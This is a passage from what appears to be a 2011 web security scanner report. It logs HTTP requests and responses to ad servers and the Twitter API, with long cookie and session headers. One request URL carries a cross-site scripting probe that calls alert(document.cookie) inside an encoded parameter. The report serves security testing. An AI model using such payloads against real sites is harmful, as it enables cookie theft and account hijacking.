KoriB99Ei88GODv6SqOupixyBnZfVB7fNZcbPD6+XNkGjE+ne6rklaCQhg9HcHbo1AwbkR1b2wnnWzwGOlASKP3Qbsj33yIssJxC7LvmxZt5+feLVUlKnJpEHVToa0wnWJ5hbBK; rsiPus_xAcs="MLsXtaEubzhnJ5H4uuj6RIn8xZaw1LAEWBmSre0b4sZdUBIO9/+QaGI8haJsP3JhILgZSp1My4GE6Vb9IpffwRghX2HMhg6NO7oSGPPBHeXbeyZm2kCVYlCpZS666NLUrxjYRtHTnRwjNNGLfBGE8mdTT5t2SfkCbcVNn+zbT9uT15r8g0GSlaiFHwm+Ot/unzv9nPq58USCe3gS0fSsxfDOHyxulhvlMrdS42lagneTgNefoyzO0Fr2JIawRqNiXmmjNVMaJrQ1ZebW93nsjuUtro4XGLLPx7UbdM1cBSapwRRFyCOwQBodwvoyty+CF6vPgc6cYlkN6Cy64hMRC9hsQRveOWunCxMPo/izJXSIvFy3gMegP2rBVtZAjZKDIklIlGBrwJUpCXAY36fJpBu5KANXZzhYuER4xlMs5f+86QOizootJtPFYTjHIkhYyKhGRerRFol9gBfX4W2raZpGSMlmWoQ6nfIv9Gq8xevtqGoZ0nxQjefIO3AaW6RL8MKFMWgV3PqSKP5I7CJUDZzva1lTOCc/qvx4i7drcIQD/VG29AHLJC6LfXXfH8+0I75aQ2HfJMsGyEIbhDO3gqihSv7TZr1+nxKA5RSJJZ+VW2m2CLV9lKTjaEgLm8t0HRKpe8ZXjM9tjUWXWLGUB91sPhCuLXXHj2cwuVZUpf32b2jtSGxvz0TpJE6/Ws022v0SeJwsjY8mW93jYVy3iQbPjblWZg6RvogvuOb47Qe+Xj3LOeZ+B4qDRWKFealchpK6jZiGj9D1Yh+LHYAc1gcRHESco8BF5keg+yg+pVK3FfhPD6cKZDz81+1wIEZE2PxIU1lBWEYQgLNAqmP3/Vq0OCffM8IWMvC/g3VLB0DK9hAderMags/QWdobxRmgLQlJd+JqBVxi40QiZjE+EU3FGvGbfGrxOsO55UEea8jQBF4NtHpI12UCMQddc07iU4MNon1s1rx4VHZ6077sV40OhnEkSUkc1XcErSvSjr8seEo+BluAUP9iIQ4pBeJcvJ5w3LM18cdgO7EOb3ER+XOhPpGuh5y3p/icgg6SARMfX8BSH+9rfz9+d/9O6aW/8Unc/CDA30Y4TrbhIzCQOgZOMAcGskEjrD1jQuY89fmVuZt5Bk/qpIe5QLvSLRQRsySc30WZZQmH7LMyZgU3S3lapQXhmx80Dtwoq6CM8uwdMDAAAX7UXvJrjMxI598OVZBrasGtiQ=="; rsi_us_1000000="pUNdIy9H8BcU1P0/aqfkn2N1Ap5g5xkLPVaivNiRJr2tZwMLeGNala4ID3nHh2cF+Gsw6USDHERTcAJfp3cNryuAzA6SuOiGdFIutB3dZ/T8x+dO+hmlVHb2yh4tEImGScOe3p8MWsj5ypTMUnI9ferMTyksjj76yG7Nk9kokeO8VL96ii3fLPe0QzjfHxSBWWq75UtXJnuMjB9bcIMAkB9UJAJ/S0rx23QzCAKU6C6rCTVhVVitZTOtAQ1ZE50PI7pYdqvGjhKw1/Je5vobciGwlQ5pVOxqQ9Dv7SaM7WEls1mZTePd7ngyzvUJcmwECsNi6Zhc2zDC8vsxy0J7nsGy4bmsxLaIX0PaZQEg3zsI1ME8qKu7NfG4v0UZaMbda/KwX5lbp7msmVxxYLXzPPG+BnKMPZHi9AP8Xs1twIoyWMH5UfZuMQrUP4YPcUTIXaBTLxacRWz5EwOKHJvsoL0UTKdMOtMz/101b/i8yWhdmb3p0yxUobDJzhzavxOdQQ9pGEJBNZRxzyG7i/2vacfZgFohS2v1gU5/1zcVmUhR+bRSIV5j28JfNkiSM65QfllM+5uq+aAuswZ7NlJNhQJrDcqWF6Wue71GyH8mfVc3XZy2TM8WwMIobcVwHd2z/YnWx3X9pKO+Qh4K10O3s23QZybm2oQ/sBScd+h9F0DZN7jluQS4DDxBM05Ml2p++zvjCpfGffgNZeWZfzFmgLD1cDR37EhDrC6gtt1hR4XCuKcIIJJlAaoy7sn2KH5gZ0uQbcbiXgOInGkS/rGfKXxO651CjNZI5V0ukm6x2wQagjxGgNDmViTLvY6N12Krh3sGelYntEM/NEi15rnx8Cg/Y7f7so8cWtv5AO098HZPvOQL1Q58I+qK7zNdOi57osoHpl2Vju55Suq1RXqyiZFPlRdTs/9Rckn0c9+0e4ICEwVykHjhrZfsFft6QYinBMX0RIGssmU+nPJld/96oOkeJL4/vrVL5e+Qa+hvscGITKwHDfJz+rLp/y63sz018w67p7Js5W0hn9TJ9uN//OgZp8YOY9xPoRPtPHS0xaldxvNbtj9iAAD2tPLBEK/rPeGqJh8KqPc5IuceiV5Xld8ORV+3QsyW0tgMdLEi/zNoTVMVQZaKVtefr/qdzVYlw0Qou9+RYrGWsUkKFw1L0ITk90I8MmkxD1dP9G2ypeedlQ2UWOpPNEllJSEN/qEl7jFbd/fIFwGkQKNnUhAxGVZUPX96qEhkS8IphDNvxP9sdvJdXeGkAsZ5W3O0IFjQebtKipu6pusUtddKXkQtb4+eXKtJOwy5tlxHKUgqOkv8uAZL5zS7Au8uTZhWhDSqHn4PyIxIbyh6NLaHdj1I/bEiqmdUropmocRRVmGCCJjD4luuLweguSW+SMCyLpZ06GwvOz2PPULSfSgYsOQShUytccaYUQXE89am8h8QuDTHIlSkKjlJcsN+M/QxFbQkaiqnvZOZ/9EKFg/gp+H1ZzVZIRIIO7bxESvpoZL5YsHSdUc7Vk74RKXe+iK+kCD0eXKa6s1RLgkSLyczMUCr1ccOMBIwvnQRwtKR+dTUqDR4ysAwAJVJ/RFrcD08JJFG5WItAVI="

Response 1

Request 2

GET /imp?Z=728x90&s=748066&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e11aa0e&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4dec54ae&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3tvXN1o+eD1xyIxlcCzatusCBJfE++0lLQNuuXZ5CT4uCSvFPNQT0hWbCTwwMzUmQfYqdTBpI9P3N3q3chR3MaWlhMjJbUeocpd1O8Sgep+oaO+IjRgHcIUICJud0O7fqoub6TzalGXqnPwzJJ5UHJSv8ywcjnyWu9H1Wcq4/KgDP73Tkh6HLB0Z+W9dmaFbUDYEXkJJpS/iw75tOwTfW/giI2GJS9b7su1iFqfUhySYGYOfDr66p86QMf+3SfQ4fFb2Vu95sP8xVU7ZWYkqKbJ9lF5lwMZv0GFqT5FCANCoeasHEnwpVDhWPUUcyw3O+p/f6CtRpHq1uaDk8uR9A28Y/odkGciZh7BdP3QWkgS+R03ooqkAF8AQoY9798jZhSIyqMD+O6SUZzfQ8eOLFZ4AAD7HeRUnfiI8B1nXx1a5s7qlk7ClFgGL2Yq7H7+N2D4YiJprcBFz5fA7pP+kSJKLeO3W8jV+fLTzCGfRdkSjdf+RWEeCttzckiQvPAoC2QhDMQw0hXnRHTB1GmUyO5yjJA5BVOpdLjeZlZwv21g6KJUaXcSZIErbyiyEwjw62RnxdA7s/LzMfqxtu4aRGWXeXeTN5OLXSeLoL4b0+E4Zqi+3KFQa+kqdtj1O/Uc65tiz3oFHjnL7uM6b29XqgW36mdYJf89adJmpDywmcjAenBlttURV48nlyj2WhrDe7c3RTF71orGDwSGXQ9ITD2bLusjZmZ8DVXaVqq8gjQtB3Q0tNCzKXlHMC+WEOt0dZQQopNKg6tTWp2tcfg7djY9ScV1IlU6jHxtcmrfslpsawJMcFf4ejv0FxL7++UYuwpCrJAA70ropBNG81+SSRZaybc9VhfBssPc+Uu83WpqpFIyXGeCiRALOBfO1MBfVx01dJ/8xWrxsW6Kt3RCLNThehKTDVQoystHiA8DJ8JGsLNtM5T9kglABxc5q/C2SPQ0kzenYBk5z5hLecLP7BjpFppgUel3sfsVRC7axsMKyHU1L5SJQl7sneRxqKD1D7QAD3l8/OI/HyLQplLYh7pBm6nY2agtV9iM77mVnunJgFn0HrAzbZiMiqzgZYd3bJIvLOP1L3enggvJ1ySeUuoLsryCTCPGMmqUDWMQDuweD2bB/NCNIVYfDeg4Kbe3Ayl9sO7yfCGCMrq6gCTS7UirE/q3nlAA/GE3bxaDPhYPM192eTUaVBICJ0uyCPqidVm3spNzLnL1Xo4EVjkyNS/1FuCBooatVAkJSCkzrrdaSRucVP+4VvJLQFozrH9YXuIiN/MhejzIDoYuHEut5UjNuNGmteXVgVnT2HjB7TwKoS0Sr5NZzwuaYNN8/vkn79fazjkOovj02xfsuxH3hqE6sFAf8+NAXhY/UdyNW6HxTy8saA/jFzKuB5qb/kJmUEaAg/EIRLhBAfG6CbK8KNbLrIchGA1fYfUDeKEO5dw/0I7pV1rIoGkXPD+j1p7I7FUeNEdZ3O1ad/7JzNMKkzuVXQVkVYQfnrJK5LfJ1qkGgL3jQldlBDiEGo/Fhn/Zxvscjh42kHH1J4nAyN6jZTRKv9Tz6Fuv56uSvHIiqOwgFoTGhEzt1k0ZHfM/5MO4sDbKMniVh+BbO8KpbZaTqsTNklzTkHPYdFWnA1/Imf2J7oiHp8nq7IWdDJ9IgiUWYNMRUJk76JvRI68ooK5NdD/t9uk3T01csXkVupfPIHpU0pVUKXch7fKhaanmX9RrTHO1KK8l/H/IK8VLviuOjDLQyTBR5r/rFnaqw31EU1wt7AqzRQv0MtLt5AhBy10UG7hHJ/582xNFtZVdIzV3+sMUymXk+e7aW; rsi_segs_1000000=pUPF5E+huQIMpzaxu2F29/z47hsEuy70RDTXd+G914J5660Uet4p7ETo+SWdpq+vjO9FyOb/GDElu8b1fCaRSIFw62TMPNHPf1Uqx8gUmMOMvyrrcedIMSklF2GlAYMSmIrtIJZyfP4Pyydb8gGQEEVPTWfUru16M3wgUTloRa1DGnHu9DnMc1auc8rlJvnrDyarDpRAiyIQYfRUCqgexMmvNfqE58La5XcyKE+kxELSBAa1/zYpbUyjmtOB0OtvZe/sCmSBGoAR5kOdyqrD2IhtKDv6Hm7ELwKhW1/80SlfI4rFnrJLbX7UnZAInsxa5gAJo4kYyL9wP83gjFu21v+Ljbe4JXONNcHEu0Gce1eCZSt7gMMJj5hcBujncOuzwe6JValzqkoUzG3Z4l7x9W4n035r+Thm+1dBZiGPuPRK62f5dqbS5k+dfOEB2C4Ac8yHd6NRXOls5lzqtCiPtU3yh7HMbMC7FKV4ntBCpgQuJVZdV4gB5DHvE8DJH5mJADuT5I9HoKBabFdqyGaatksuvficHH6shBTimFXWQqrZvS0wJISpelTmvT6MMLL6uX+IxeAKTal7iL3J/Ugmq+Y=; rtc_uJev=MLv/+QUJZjpn51IpAxjOavnaN4hKHsFKsArs1un9DiMi54ZO4wU4y0HsTfVxQcrrHSlE5FfEOUQroSDJyCQsxdLt7/+VDDyQPWRIX0xytnLBcQo53lKbEFpO3wIAuZz8HZvTV4jq26xTQlJbMB51kHXRMAfIYvU73OSE4v31+q1AsUQlmSW4MDxsUSl5syf9EAwGgMz8aTvWQss79Aoznerv/oPoLcS3IZ+nWYWt+OUqy+XB+Z60V8o7HQEhaE3h69iJIn8VtBpn+JyggNrNZP6VE97ADibCZgnznBHV4DQAPlI5qn054L4TEnkAg74ZDWQcD2+RFoWZBsYuvxEiPGirR+WcagTHF5VLx+nbqzqWKSXuZznwqyEnYlBZlUSMiSfGOoGVGMZlj87aQGSBYaESVnBO1uZ+YvFCIZJaEs5noLzF9OvdIjFsqjm2CXCcjyBP0B3WamO/GKhCvFjJwLorslmR8lc1xhZEq2W9AThoxiDM2IPsMHPt00376pU9pxVxN4J4i7BaEsFj71txvTn8wxVHX2mJYKppvllHdj4p/TXP8vuko61EuIhnljjwr+r2y/QmWzZfKqIejE1/03rU76tNeFBRDWR8aOyipbeh+uyTUpNI4F5CYz7Gvx2cycfmR+h+2FFCiEnrGz5xIiEZe+vlbLuOP1Teb0Mm5AoWhxh5E4NHL8ip21OpNqRAst/Owp+rabyr+y/wSDSU+PgbsrPOrZuP5DdctZS2vZ31/BspFFynU0vInbd6C8M41e7tObXyHbSc6JY6oL+ry8yJypsCxvlch7UL9bFNYKo3QoHT/b0K24rjLq7b5CyoVKlSHFsYW/nT1UbxVRlK9xjsUKgOW8+WD7LLJ9aLBOSXxXEa2gDU+FShT/yVZ5ST8Gz7fXtIczqrXFvAz8gojNIMCeZLGGJGSr78JZ9B5hC0PJWZsjLvZEMR9emYXBe71pQr3U5g6O2gnG1Q1x4RFm1ZsuLTctS2Np44xP9z1I01uEqcYVAaRagWGq3VZfYeqkuoIKPi9MID+Ndo1pamWoRhdiBEgrN8lO7+XLOBqApQ7zAcuZmjE79m8JfUvicISIu1O2QI93UXBytj5kmlaOEzXPGeEPnLopVuqvJFT7XOoD95J4ws49PwJ+b41WcNJEVpXCnmGfcw8Ej5o/D5gQrEGOQbM2/Di7zsqPFXCk86l8pOcnoG0KnNkQOrdlhL0nMtTPxLFVJrxsWl2mdpxlk1grOkmm7m55QD6zgCVxLlBr5W8BY3nx8MiGYxs6KwwKe9uC+UDtslJGuHjK3vuQ5LI5FUjgWFctA6iJzjR0icFenZZ//wsVxgnH/AWVfu6vF+4a3RpKHlQXo/pra89IahUKf47qaLJWe+MNyvehXi5zuM84yZ4jFAGTkXh3HNCMYB16La9jg3t61HuYu2OIPNgP2I6I8tKA/ddo95qmopGg1jO43mLmFxgw4jb3T5pohnBBGs9+VPqCDIH6fSfj4KT+Rq+SNTGT7GfVEEKjwlKoNUNuIfawbdFDh6vB1VD0LW3DoOKTu7bNZ0zmnOWEjGMwebwQJRel1UTreh58fk0xF4gmP2UyeCCLNFcjK1vTciJUUwxoD2b2Y4enJAjiKy+KHl4t4BEUiBU+PwDLGt2Yc2brjSeJv7T6uHZrAsKqTRn48kG3AJXwOH7Mx7OE1yp1NoSHAyf22LDiTxLdP56pliRIjXpaTOT5ht8EbsH2uvTGXedE4iACnn7pwC9AMI6JByiXZotWH9gO8HP2GMoEiL7+6BashzcvvO7rt5EFMabkI7WKoriB99Ei88GODv6SqOupixyBnZfVB7fNZcbPD6+XNkGjE+ne6rklaCQhg9HcHbo1AwbkR1b2wnnWzwGOlASKP3Qbsj33yIssJxC7LvmxZt5+feLVUlKnJpEHVToa0wnWJ5hbBK; rsiPus_xAcs="MLsXtaEubzhnJ5H4uuj6RIn8xZaw1LAEWBmSre0b4sZdUBIO9/+QaGI8haJsP3JhILgZSp1My4GE6Vb9IpffwRghX2HMhg6NO7oSGPPBHeXbeyZm2kCVYlCpZS666NLUrxjYRtHTnRwjNNGLfBGE8mdTT5t2SfkCbcVNn+zbT9uT15r8g0GSlaiFHwm+Ot/unzv9nPq58USCe3gS0fSsxfDOHyxulhvlMrdS42lagneTgNefoyzO0Fr2JIawRqNiXmmjNVMaJrQ1ZebW93nsjuUtro4XGLLPx7UbdM1cBSapwRRFyCOwQBodwvoyty+CF6vPgc6cYlkN6Cy64hMRC9hsQRveOWunCxMPo/izJXSIvFy3gMegP2rBVtZAjZKDIklIlGBrwJUpCXAY36fJpBu5KANXZzhYuER4xlMs5f+86QOizootJtPFYTjHIkhYyKhGRerRFol9gBfX4W2raZpGSMlmWoQ6nfIv9Gq8xevtqGoZ0nxQjefIO3AaW6RL8MKFMWgV3PqSKP5I7CJUDZzva1lTOCc/qvx4i7drcIQD/VG29AHLJC6LfXXfH8+0I75aQ2HfJMsGyEIbhDO3gqihSv7TZr1+nxKA5RSJJZ+VW2m2CLV9lKTjaEgLm8t0HRKpe8ZXjM9tjUWXWLGUB91sPhCuLXXHj2cwuVZUpf32b2jtSGxvz0TpJE6/Ws022v0SeJwsjY8mW93jYVy3iQbPjblWZg6RvogvuOb47Qe+Xj3LOeZ+B4qDRWKFealchpK6jZiGj9D1Yh+LHYAc1gcRHESco8BF5keg+yg+pVK3FfhPD6cKZDz81+1wIEZE2PxIU1lBWEYQgLNAqmP3/Vq0OCffM8IWMvC/g3VLB0DK9hAderMags/QWdobxRmgLQlJd+JqBVxi40QiZjE+EU3FGvGbfGrxOsO55UEea8jQBF4NtHpI12UCMQddc07iU4MNon1s1rx4VHZ6077sV40OhnEkSUkc1XcErSvSjr8seEo+BluAUP9iIQ4pBeJcvJ5w3LM18cdgO7EOb3ER+XOhPpGuh5y3p/icgg6SARMfX8BSH+9rfz9+d/9O6aW/8Unc/CDA30Y4TrbhIzCQOgZOMAcGskEjrD1jQuY89fmVuZt5Bk/qpIe5QLvSLRQRsySc30WZZQmH7LMyZgU3S3lapQXhmx80Dtwoq6CM8uwdMDAAAX7UXvJrjMxI598OVZBrasGtiQ=="; rsi_us_1000000="pUNdIy9H8BcU1P0/aqfkn2N1Ap5g5xkLPVaivNiRJr2tZwMLeGNala4ID3nHh2cF+Gsw6USDHERTcAJfp3cNryuAzA6SuOiGdFIutB3dZ/T8x+dO+hmlVHb2yh4tEImGScOe3p8MWsj5ypTMUnI9ferMTyksjj76yG7Nk9kokeO8VL96ii3fLPe0QzjfHxSBWWq75UtXJnuMjB9bcIMAkB9UJAJ/S0rx23QzCAKU6C6rCTVhVVitZTOtAQ1ZE50PI7pYdqvGjhKw1/Je5vobciGwlQ5pVOxqQ9Dv7SaM7WEls1mZTePd7ngyzvUJcmwECsNi6Zhc2zDC8vsxy0J7nsGy4bmsxLaIX0PaZQEg3zsI1ME8qKu7NfG4v0UZaMbda/KwX5lbp7msmVxxYLXzPPG+BnKMPZHi9AP8Xs1twIoyWMH5UfZuMQrUP4YPcUTIXaBTLxacRWz5EwOKHJvsoL0UTKdMOtMz/101b/i8yWhdmb3p0yxUobDJzhzavxOdQQ9pGEJBNZRxzyG7i/2vacfZgFohS2v1gU5/1zcVmUhR+bRSIV5j28JfNkiSM65QfllM+5uq+aAuswZ7NlJNhQJrDcqWF6Wue71GyH8mfVc3XZy2TM8WwMIobcVwHd2z/YnWx3X9pKO+Qh4K10O3s23QZybm2oQ/sBScd+h9F0DZN7jluQS4DDxBM05Ml2p++zvjCpfGffgNZeWZfzFmgLD1cDR37EhDrC6gtt1hR4XCuKcIIJJlAaoy7sn2KH5gZ0uQbcbiXgOInGkS/rGfKXxO651CjNZI5V0ukm6x2wQagjxGgNDmViTLvY6N12Krh3sGelYntEM/NEi15rnx8Cg/Y7f7so8cWtv5AO098HZPvOQL1Q58I+qK7zNdOi57osoHpl2Vju55Suq1RXqyiZFPlRdTs/9Rckn0c9+0e4ICEwVykHjhrZfsFft6QYinBMX0RIGssmU+nPJld/96oOkeJL4/vrVL5e+Qa+hvscGITKwHDfJz+rLp/y63sz018w67p7Js5W0hn9TJ9uN//OgZp8YOY9xPoRPtPHS0xaldxvNbtj9iAAD2tPLBEK/rPeGqJh8KqPc5IuceiV5Xld8ORV+3QsyW0tgMdLEi/zNoTVMVQZaKVtefr/qdzVYlw0Qou9+RYrGWsUkKFw1L0ITk90I8MmkxD1dP9G2ypeedlQ2UWOpPNEllJSEN/qEl7jFbd/fIFwGkQKNnUhAxGVZUPX96qEhkS8IphDNvxP9sdvJdXeGkAsZ5W3O0IFjQebtKipu6pusUtddKXkQtb4+eXKtJOwy5tlxHKUgqOkv8uAZL5zS7Au8uTZhWhDSqHn4PyIxIbyh6NLaHdj1I/bEiqmdUropmocRRVmGCCJjD4luuLweguSW+SMCyLpZ06GwvOz2PPULSfSgYsOQShUytccaYUQXE89am8h8QuDTHIlSkKjlJcsN+M/QxFbQkaiqnvZOZ/9EKFg/gp+H1ZzVZIRIIO7bxESvpoZL5YsHSdUc7Vk74RKXe+iK+kCD0eXKa6s1RLgkSLyczMUCr1ccOMBIwvnQRwtKR+dTUqDR4ysAwAJVJ/RFrcD08JJFG5WItAVI="

Response 2

16.3. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Request 1

Response 1

Request 2

GET /adserver/vdi/742697?d=4325897289836481830 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MlCqBQA%3D"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; rb2=Ch0KBjcxMjE1Nhij2_fAGiINMXZvb2Z5NmEwdGsxdwo4CgY3MTIxODEY5Lqa4BYiKFdIOXFZbGQyUW5KQURXMWRCd1Y0VkFaVWFYc1FkUUpDRFY5aVgxcFAKIwoGNzQyNjk3GOilqtsWIhM0MzI1ODk3Mjg5ODM2NDgxODMwCiQKBjc1MzI5MhjXvfa6FyIUQUctMDAwMDAwMDEzODkzNTg1NTQKNAoGODA2MjA1GOihjekdIiQ5ZWQzZjJmMi03ZjVhLTExZTAtYTA3YS0wMDI1OTAwOWE5ZTQQAQ; ut="1%3AVZDLkoMgEEX%2FhbULQGU0f6OiQWMjDxOiIf8%2B2qRSM9tT9%2FStvi%2Fy4OTyIrd%2BC4uTnlyIvU%2Bhjsx3JbSRRZp5ZmsRmQvQOwTWyh2ORGGYQeDCDCsm7kNK1MuzOkArpyUl9NBtCGb%2BVeypaJanlgo2eYDG5AkY362n4q7rDUGnZjFuotAHnFXVfLUGNRrS4d3ZQ%2FP0R%2BiPpqqrpcqcbeNe%2FoPLX%2Bggt3A2KuCxiH7IfGkWjIC2qU5MEx4CxT%2F9gwAEdXrdD3YuEcg0js%2FpE%2BfTHB8jGWkbrXs34tzk%2Ff4F"

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 13 Jun 2011 11:13:09 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=Ch0KBjcxMjE1Nhij2_fAGiINMXZvb2Z5NmEwdGsxdwojCgY3NDI2OTcYp5-l7BkiEzQzMjU4OTcyODk4MzY0ODE4MzAKNAoGODA2MjA1GOihjekdIiQ5ZWQzZjJmMi03ZjVhLTExZTAtYTA3YS0wMDI1OTAwOWE5ZTQQAQ; path=/; domain=.adbrite.com; expires=Sun, 11-Sep-2011 11:13:09 GMT
Set-Cookie: ut="1%3AVZDLkoMgEEX%2FhbULQGU0f6OiQWMjDxOiIf8%2B2qRSM9tT9%2FStvi%2Fy4OTyIrd%2BC4uTnlyIvU%2Bhjsx3JbSRRZp5ZmsRmQvQOwTWyh2ORGGYQeDCDCsm7kNK1MuzOkArpyUl9NBtCGb%2BVeypaJanlgo2eYDG5AkY362n4q7rDUGnZjFuotAHnFXVfLUGNRrS4d3ZQ%2FP0R%2BiPpqqrpcqcbeNe%2FoPLX%2Bggt3A2KuCxiH7IfGkWjIC2qU5MEx4CxT%2F9gwAEdXrdD3YuEcg0js%2FpE%2BfTHB8jGWkbrXs34tzk%2Ff4F"; path=/; domain=.adbrite.com; expires=Thu, 10-Jun-2021 11:13:09 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 13-Jun-2011 11:13:09 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

16.4. http://api.twitter.com/1/FanSided/lists//statuses.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/FanSided/lists//statuses.json

Request 1

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:03:30 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1307963010-32150-37551
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 13 Jun 2011 11:03:30 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 4bf5d68d1efe0aa503fb0c788b4c6f7c89848e3d
Set-Cookie: external_referer=Bm9gjDJKLkNUA6KUQhqcURlVnkat6%2FAa0nQJRijFpP696HbzgOR%2BrPDoOcSsLUsQqgRs7aQNlpGXT0Ue1ThS%2BnB2T6v43msK%7C0; path=/; expires=Tue, 14 Jun 2011 11:03:30 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIoBq4gwAToHaWQiJTY3MzNhYWQwMGYwZGZh%250AM2RjMzRjNGI0YmM4ODI3OGQ2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e8cfadc4dddd72c57b26f1ed5cab8aa85cb06060; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta content="noarchive,noindex" name="robots" />
<title>Twitter / ?</title>
<link href="//si0.twimg.com/sticky/error_pages/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<style type="text/css">
* { border: 0; padding: 0; margin: 0; }
body{ margin: 10px 0; background:#C0DEED url(//si0.twimg.com/sticky/error_pages/bg-clouds.png) repeat-x; color:#333; font: 12px Lucida Grande, Arial, sans-serif; text-align:center }
#container { width: 755px; margin: 0 auto; padding: 0px 0; text-align: left; position: relative; }
#content { width: 100%; margin-top: 8px; float: left; padding-bottom: 15px; background: transparent url(//si0.twimg.com/sticky/error_pages/arr2.gif) no-repeat scroll 21px 0px;}
.subpage #content .wrapper { background: #fff url(//si0.twimg.com/sticky/error_pages/not-found.png) no-repeat 565px 16px; -moz-border-radius: 5px; -webkit-border-radius: 5px; padding: 10px 0;}
.subpage #content h2 { margin: 5px 20px; font: bold 26px Helvetica Neue, Helvetica, Arial, sans-serif; *padding-bott
...[SNIP]...

Request 2

GET /1/FanSided/lists//statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1307962963626=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
